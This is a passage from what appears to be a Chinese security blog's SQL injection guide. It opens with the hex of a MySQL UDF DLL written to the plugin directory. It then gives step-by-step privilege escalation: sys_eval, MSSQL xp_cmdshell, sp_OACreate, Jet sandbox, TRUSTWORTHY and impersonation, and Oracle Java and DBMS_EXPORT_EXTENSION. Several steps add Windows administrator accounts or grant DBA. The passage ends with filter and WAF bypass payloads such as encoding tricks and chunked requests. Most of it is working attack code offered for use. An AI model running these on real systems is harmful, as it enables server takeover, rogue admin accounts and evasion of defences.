2C8A074883C7013C80720A3C8F7706807FFE0F74062CE83C0177233817751F8B072500FFFFFF0FC829F801D8AB4883E9048A074883C70148FFC975D9EB0548FFC975BE4883EC28488DBE007000008B0709C0744F8B5F04488D8C30B0A100004801F34883C708FF96ECA1000048958A0748FFC708C074D74889F94889FAFFC8F2AE4889E9FF96F4A100004809C074094889034883C308EBD64883C4285D5F5E5B31C0C34883C4284883C704488D5EFC31C08A0748FFC709C074233CEF77114801C3488B03480FC84801F0488903EBE0240FC1E010668B074883C702EBE1488BAEFCA10000488DBE00F0FFFFBB00100000504989E141B8040000004889DA4889F94883EC20FFD5488D871702000080207F8060287F4C8D4C24204D8B014889DA4889F9FFD54883C4285D5F5E5B488D4424806A004839C475F94883EC804C8B442418488B542410488B4C2408E91F79FFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005CB0000054010000E404000000000000586000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564338302E435254222076657273696F6E3D22382E302E35303630382E30222070726F636573736F724172636869746563747572653D22616D64363422207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E0000000000000000000000002CB20000ECB1000000000000000000000000000039B200001CB20000000000000000000000000000000000000000000044B200000000000052B200000000000062B200000000000072B200000000000080B200000000000000000000000000008EB200000000000000000000000000004B45524E454C33322E444C4C004D5356435238302E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C46726565000000667265650000000000000000A727A15A0000000074B30000010000001200000012000000C0B2000008B3000050B300007010000060100000001000008015000060100000701500002014000060100000901300000014000060100000901300003011000060100000C010000000130000E0120000A011000089B300009FB30000BCB30000D7B30000E3B30000F6B3000007B4000010B4000020B400002EB4000037B4000047B4000055B400005DB400006CB4000079B4000081B4000090B4000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E69740000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 into dumpfile 'C:/Tool/phpstudy_pro/Extensions/MySQL5.5.29/lib/plugin/udf.dll';

  5. 如果没有webshell、MySQL大于5.1、系统为win、\lib\plugin目录默认不存在,直接导出字符串到文件会报错,可以使用ADS创建plugin目录[^ 25]

    select ‘xxx’ into dumpfile ‘MySQL目录/lib::$INDEX_ALLOCATION’;

    1
    2
    3
    -- 虽然会报错,但是会成功创建目录
    select 'xxx' into dumpfile 'C:/Tool/phpstudy_pro/Extensions/MySQL5.5.29/lib::$INDEX_ALLOCATION';
    select 'xxx' into dumpfile 'C:/Tool/phpstudy_pro/Extensions/MySQL5.5.29/lib/plugin::$INDEX_ALLOCATION';

  6. 创建函数引用上传的udf文件

    1
    2
    3
    4
    -- win
    create function sys_eval returns string soname 'udf.dll';
    -- Linux
    create function sys_eval returns string soname 'udf.so';

  7. 使用创建的函数执行命令

    1
    2
    3
    select sys_eval('net user');
    select sys_eval('net user hpdoger 123456 /add');
    select sys_eval('net localgroup administrators hpdoger /add');

  8. 成功提权

    查看函数的命令是

    1
    select * from mysql.func;

    删除函数的命令是

    1
    drop function sys_eval;

详细链接[^ 26],一些小技巧[^ 27]

SQLServer

命令提权

前提:

  1. 有SQL server 的shell

  2. SQL server的账户拥有system权限(sa账户直接拥有system权限)

  3. SQL server的启动账户拥有administrator权限

    注:本人在win7上测试的时候,发现SQL server的启动账户默认是网络服务,并没有权限,所以自己测试的时候需要改成本地账户

    ​ 更改方法:服务->SQL Server (SQLEXPRESS)->登录->本地系统账户

细节:

xp_cmdshell

  1. 查询xp_cmdshell是否开启

    1
    SELECT CONVERT(INT, ISNULL(value, value_in_use)) AS config_value FROM  sys.configurations WHERE  name = 'xp_cmdshell';

  2. 开启xp_cmdshell

    1
    2
    3
    4
    EXEC sp_configure 'show advanced options',1;
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'xp_cmdshell',1;
    EXEC sp_configure reconfigure;

  3. 创建系统用户并赋予管理员权限

    1
    2
    exec master..xp_cmdshell 'net user testaa pinohd123. /add';
    exec master..xp_cmdshell 'net localgroup administrators testaa /add';

  4. 关闭xp_cmdshell

    1
    2
    3
    4
    5
    6
    EXEC sp_configure 'show advanced options',1;
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'xp_cmdshell',0;
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'show advanced options',0;
    EXEC sp_configure reconfigure;

sp_OACreate

  1. 查询是否开启(默认关闭)

    1
    SELECT CONVERT(INT, ISNULL(value, value_in_use)) AS config_value FROM  sys.configurations WHERE  name = 'Ole Automation Procedures';

  2. 开启sp_OACreate

    1
    2
    3
    4
    exec sp_configure 'show advanced options', 1;
    EXEC sp_configure reconfigure;
    exec sp_configure 'Ole Automation Procedures', 1;
    EXEC sp_configure reconfigure;

  3. 创建系统用户并赋予管理员权限

    1
    2
    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'cmd.exe /c net user test 123123123. /add'
    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'cmd.exe /c net localgroup administrators test /add'

  4. 关闭sp_OACreate

    1
    2
    3
    4
    5
    exec sp_configure 'show advanced options', 1;
    EXEC sp_configure reconfigure;
    exec sp_configure 'Ole Automation Procedures', 0;
    EXEC sp_configure reconfigure;
    exec sp_configure 'show advanced options', 0;

更多详见[^ 28]

沙盒提权

前提:

  1. 有SQL server 的shell

  2. SQL server的账户拥有system权限(sa账户直接拥有system权限)

  3. SQL server的启动账户拥有administrator权限

    注:本人在win7上测试的时候,发现SQL server的启动账户默认是网络服务,并没有权限,所以自己测试的时候需要改成本地账户

    ​ 更改方法:服务->SQL Server (SQLEXPRESS)->登录->本地系统账户

  4. 32位系统(64位win7测试失败)

细节:

  1. 开启沙盒模式

    1
    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;

  2. 创建系统用户并赋予管理员权限

    1
    2
    select * from openrowset('microsoft.jet.oledb.4.0' ,';database=c:\windows\system32\ias\ias.mdb' ,'select shell("cmd.exe /c net user quan 121345 /add")')
    select * from openrowset('microsoft.jet.oledb.4.0' ,';database=c:\windows\system32\ias\ias.mdb' ,'select shell("cmd.exe /c net localgroup administrators quan /add")')

  3. 更改回默认值

    1
    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',2;

更多详见[^ 29]

可信数据库提权(从dbo到sysadmin)

前提:

  1. 有SQL server 的shell
  2. 当前账户的所属数据库存在开启可信(TRUSTWORTHY)的数据库

细节:

  1. 查询开启可信的数据库

    1
    SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;

    值为1的数据库即为开启可信

  2. 将用户权限提升到sysadmin(数据库名以及用户名自行替换)

    1
    2
    3
    4
    5
    6
    7
    8
    -- 切换到可信数据库
    USE TestDb;
    -- 将当前用户提升到sysadmin权限
    GO
    CREATE PROCEDURE sp_elevate_me WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'singll','sysadmin';
    GO
    -- 执行
    EXEC sp_elevate_me;

  3. 验证

    1
    2
    -- 查看当前用户是否是sysadmin权限
    SELECT is_srvrolemember('sysadmin')

  4. 设置可信数据库的方式(方便复现)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    -- 设置可信数据库的过程,全程在sysadmin权限下进行
    -- 创建数据库
    CREATE DATABASE TestDb;

    -- 切换到数据库
    USE TestDb;

    -- 将数据库赋给用户singll
    ALTER LOGIN [singll] with default_database = [TestDb];

    -- 创建用户- -
    CREATE USER [singll] FROM LOGIN [singll];

    -- 给与dbo权限
    EXEC sp_addrolemember [db_owner], [singll];

    -- 设置数据库为可信 **
    ALTER DATABASE TestDb SET TRUSTWORTHY ON;

用户模拟提权(从dbo到sysadmin)

前提:

  1. 有SQL server 的shell
  2. 当前用户开启了用户模拟(模拟sa或其他sysadmin权限的用户)

细节:

  1. 查询当前用户模拟的用户列表

    1
    SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';

  2. 模拟用户进行提权

    1
    2
    -- 模拟sa
    EXECUTE AS LOGIN = 'sa';

  3. 验证

    1
    2
    3
    4
    5
    -- 查看当前用户,发现变成模拟的用户,此处是sa
    SELECT SYSTEM_USER;

    -- 判断是否有sysadmin权限
    SELECT IS_SRVROLEMEMBER('sysadmin');

  4. 设置模拟用户的方法(方便复现)

    1
    2
    3
    4
    5
    6
    7
    -- 创建用户模拟环境
    CREATE LOGIN singll001 WITH PASSWORD = 'Singll001.';

    -- 赋予用户权限模拟sa
    USE master;
    GRANT IMPERSONATE ON LOGIN::sa to [singll001];
    GO

关于从dbo到sysadmin见[^ 30]

Oracle

Java命令执行提权

前提:

  1. 账号具有Java命令执行权限(JAVASYSPRIV)
  2. 数据库运行权限是system/root,否则只能以低权限账户执行系统命令

细节:

1
2
3
4
5
6
7
8
9
10
11
-- 创建Java包
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;

-- 获取Java权限
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<ALL FILES>>'''',''''EXECUTE'''');end;''commit;end;') from dual;

-- 创建执行命令的函数select
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function shell(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;

-- 执行命令
select shell('whoami') from dual;

赋予账号Java命令执行权限的SQL语句:

1
GRANT JAVASYSPRIV TO singll;

详细链接[^ 17]

DBMS_EXPORT_EXTENSION 提权(Oracle10g 经典提权漏洞)

前提:

  1. 版本 < 10.2.0.4

细节:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
-- 查询权限
select * from user_role_privs;

-- 创建程序包
Create or REPLACE
PACKAGE HACKERPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env
SYS.odcienv)
RETURN NUMBER;
END;


-- 创建程序包体
Create or REPLACE PACKAGE BODY HACKERPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env
SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO singll';
COMMIT;
RETURN(1);
END;
END;



-- 创建过程
DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1';
INDEX_SCHEMA := 'SINGLL';
TYPE_NAME := 'HACKERPACKAGE';
TYPE_SCHEMA := 'SINGLL';
VERSION := '10.2.0.2.0';
GMFLAGS := 1;
v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(INDEX_NAME =>
INDEX_NAME,
INDEX_SCHEMA=> INDEX_SCHEMA,
TYPE_NAME => TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA,
VERSION => VERSION,
NEWBLOCK => NEWBLOCK,
GMFLAGS => GMFLAGS);
END;

更多链接^ 31

0x02 过滤绕过

一些通用的绕过方法

大小写

Select、SeLect、UnIOn等

多重关键词

过滤方法是将关键词删除,可以使用。selselectect、uniunionon等

编码

将符号进行编码或者二次编码,可以绕过对符号的过滤。比如Unicode

1
2
3
4
单引号:%u0027%u02b9%u02bc、%u02c8%u2032%uff07%c0%27%c0%a7%e0%80%a7
空格:%u0020%uff00%c0%20%c0%a0%e0%80%a0
左括号:%u0028%uff08%c0%28%c0%a8%e0%80%a8
右括号:%u0029%uff09%c0%29%c0%a9%e0%80%a9

程序自定义过滤绕过

SELECT

未发现好用的绕过方式,可以通过其他方式配合,比如堆叠注入中,利用无select进行注入、使用预编译对字符串进行拼接。

UNION

未发现好用的绕过方式,可以通过换成布尔注入来获取数据。

AND OR XOR NOT

and => &&

or => ||

xor => |

not => !

注:只有MySQL支持

空格

  1. /**/

    1
    SELECT/**/*/**/FROM/**/users;

  2. ()

    1
    SELECT(id)FROM(users);

    注:括号中不可以是*

  3. ``

    1
    SELECT`id`FROM`users`;

    注:``之间不可以是*,只有MySQL可用

  4. %0d %0a %0c %0b

    1
    2
    3
       -1'%0Aunion%0Aselect%0A1,2,3%0A'
       -1'union%0Dselect%0D1,2,3%0D'asd
    -1'union%0Dselect%0D1,'2',3%0Dfrom%0Ddual--

    注:只对于正则过滤空格 \x20 的情况。很多时候过滤空格是使用 \s ,%0a就不能绕过了

以下部分位置空格绕过的方法

  1. + - @ !
1
SELECT+name FROM users;

注:只能替代select后的空格,且部分符号只支持MySQL

等号(=)

  1. 模糊匹配

    1
    SELECT * FROM users WHERE id LIKE 1;

    注:MySQL可以用RLIKE代替LIKE

  2. <>

    1
    SELECT * FROM users WHERE not (name <> 'xxx')

    注:MySQL可以用**!代替not**

  3. 正则匹配

    1
    2
    3
    4
    5
    -- MySQL
    SELECT * FROM users WHERE name regexp 'xxxx';

    -- Oracle
    SELECT * FROM users WHERE regexp_like(name,'xxx');

    注:SQLServer没有正则函数,需要自定义

单双引号’”

无通用直接绕过方法,有部分特定场景下的绕过方法

  1. 无需单双引号闭合:使用十六进制来代替需要单双引号的地方

    1
    UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name=0x61645F6C696E6B

  2. 在同一个SQL语句中有两个以上的注入点的时候:在第一个注入点使用\将单双引号转义,然后在第二个注入点进行注入

    1
    SELECT * FROM users WHERE id='1\' and name='union select 1,2,3 -- ';

    注:只有MySQL支持\转义,SQLServer和Oracle不可以用

大小于号><

  1. between a and b

    1
    SELECT * FROM dbo.users WHERE age BETWEEN 20 AND 24;

  2. 或者使用等号= 来进行遍历

逗号,

部分场景可以绕过

  1. substr(),mid() -> from for MySQL

    1
    2
    SELECT substr(database() from 1 fro 1)
    SELECT mid(database() from 1 for 1)

  2. select逗号 -> join MySQL

    1
    2
    3
    4
    5
    SELECT * from (SELECT 1)a join (SELECZT 2)b

    -- 等价于

    SELECT 1,2

  3. limit -> offset MySQL

    1
    2
    3
    4
    5
    SELECT * FROM users LIMIT 0,1;

    -- 等价于

    SELECT * FROM users LIMIT 1 OFFSET 0

函数

  • sleep() -> benchmark() MySQL
  • group_concat() -> concat_ws() Oracle
  • hex()、bin() -> ascii()

更多情况查看链接[^ 32][^ 33][^ 34][^ 35]

WAF绕过

分块传输

分块传输是HTTP的一种数据传输机制,部分waf不对分块传输进行组装,导致可以绕过

Transfer-Encoding: chunked

正常数据包:

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /sqli-labs/Less-13/ HTTP/1.1
Host: 192.168.157.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.157.128/sqli-labs/Less-13/
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Connection: close
Upgrade-Insecure-Requests: 1

uname=admin' and '1'='1&passwd=admin&submit=Submit

分块传输数据包:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
POST /sqli-labs/Less-13/ HTTP/1.1
Host: 192.168.157.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.157.128/sqli-labs/Less-13/
Content-Type: application/x-www-form-urlencoded
Content-Length: 549
Connection: close
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked

3;A9tJGnncl
una
2;IZCb6hT1eJ8qD
me
1;XBVvEZRt
=
2;1JP2AENFXfVXScW
ad
2;SPCsugLe
mi
1;zNImE4Q0C
n
1;yyu6Cy7w
'
2;U12gTQPADIkANVRtyaKKPpdbK
 a
1;cBj2s6Mi0IW29j0Ha
n
3;Lt1eA6N8EDeIh6Z1PlJd
d '
3;ozUW1SOXEMe1CPPprlx9a
1'=
2;lNtSRS
'1
1;4OxDMPbIamzEtV3Bf
&
3;vcN7Eym
pas
2;HkiuPiR3
sw
3;SuHLgqpc2
d=a
1;0scle5WntQz8ekq9jocoEKIm
d
2;RoDyHmSY2R5iN625dbY9or
mi
1;X4IQxqpfUYf6DW
n
3;gz5l6lr5
&su
3;9BtN2uhDTOBPVpd
bmi
2;Gqu9QCnek
t=
1;E1TwH64Iu
S
2;oL9sgon
ub
2;yIc4sjuGyOMIQLZYm8tfzf
mi
1;zBprsBRP
t
0

参考资料[^ 36],以及插件[^ 37]

超大数据包

部分WAF因为性能,只检查较小的数据包,或者只检查一定大小限定内的内容,超过部分会略过

正常payload:

1
?id=1+and+sleep(3)

绕过payload:

1
?id=1+and+sleep(3)+and+111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

注释

部分waf使用的是整体正则匹配,如果在正常的SQL语句中加入注释符,就会匹配不到,达到绕过的效果

正常payload:

1
?id=1+and+sleep(3)+and+1=2

绕过payload:

1
?id=1+and/**/sleep(3)/**/and/**/1=2

未覆盖场景

有的WAF在GET和POST都可以使用的时候,只对其中一个进行过滤,或者只对GET和POST方法进行过滤,其他方法可以绕过。还有只对GET参数和POST参数进行过滤,Cookie或其他HTTP头没有进行过滤。以上都可以进行绕过

未覆盖协议

有的waf只对特定的content-type进行过滤,可以对content-type进行更改进行绕过尝试

1
2
3
4
Content-Type:multipart/form-data
Content-Type:application/x-www-form-urlencoded
Content-Type: text/xml
Content-Type: application/json

参考链接[^ 38],还有对WAF进行FUZZ的方法[^ 39]

0x03 参考资料

[^ 2]:【技术分享】MySQL 注入攻击与防御
[^ 3]: 【技术分享】MSSQL 注入攻击与防御
[^ 4]: SQL注入小结(Oracle)
[^ 5]: 十种MySQL报错注入
[^ 6]: MYSQL报错注入的一点总结
[^ 7]: sql注入之——sqlserver报错注入
[^ 8]: Oracle报错注入总结
[^ 9]: 【sql注入教程】mysql注入直接getshell
[^ 10]: Sql注入getshell
[^ 11]:渗透利用mysql总结
[^ 12]:【数据库】MySQL写shell
[^ 13]:MSSQL注入 突破不能堆叠的限制执行系统命令
[^ 14]: Web渗透之mssql LOG备份getshell
[^ 15]: mssql注入和getshell
[^ 16]:MSSQL多种姿势拿shell和提权
[^ 17]:数据库—从注入到提权的全家桶套餐
[^ 18]:美创安全实验室 | 三大数据库写入WebShell的姿势总结

[^ 25]: mysql 5.* udf提权之利用ADS创建lib\plugin目录
[^ 26]: MYSQL UDF提权
[^ 27]: 利用MySQL UDF提权过程中的一些技巧
[^ 28]: MSSQL中执行OS命令大全
[^ 29]: Day5——提权学习之MSSQL数据库提权学习总结
[^ 30]: 浅谈SQL Server从DBO用户提权到DBA的两种思路

[^ 32]: SQL注入绕过 方式总结
[^ 33]: SQL注入绕过技巧
[^ 34]: SQL注入WAF绕过
[^ 35]: SQL注入绕过过滤总结
[^ 36]: 利用分块传输吊打所有WAF
[^ 37]: burp插件
[^ 38]: WAF机制及绕过方法总结:注入篇
[^ 39]: WAF绕过之SQL注入(归来)

Security
Security

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!